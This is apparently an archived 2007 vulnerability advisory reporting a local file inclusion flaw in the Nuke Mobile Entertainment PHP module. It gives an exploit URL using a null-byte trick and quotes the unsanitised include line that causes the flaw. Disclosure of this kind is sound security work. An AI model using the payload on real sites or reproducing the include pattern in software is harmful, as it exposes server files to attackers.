Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) JSPWiki Multiple Vulnerabilities Arbitrary Command Inclusion Freeside XSS vuln. Google Urchin password theft madness From:h3llcode_(at)_hotmail.it <h3llcode_(at)_hotmail.it> Date:25.09.2007Subject:Nuke Mobile Entartainment Local File Inclusion----------------------------------------------- # Found by Seph1roth # http://blackroots.it ----------------------------------------------- # Vulnerable script download http://www.suonerie-polifoniche-gratis.net/mobilentertainment.zip # Bug : http://VICTIM/[path]/data/compatible.php?module_name=[Local File]%00 # This is the vulnerable code : # include 'modules/'.$module_name.'compatibility/data/marque.data.php';
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
JSPWiki Multiple Vulnerabilities
Arbitrary Command Inclusion
Freeside XSS vuln.
Google Urchin password theft madness
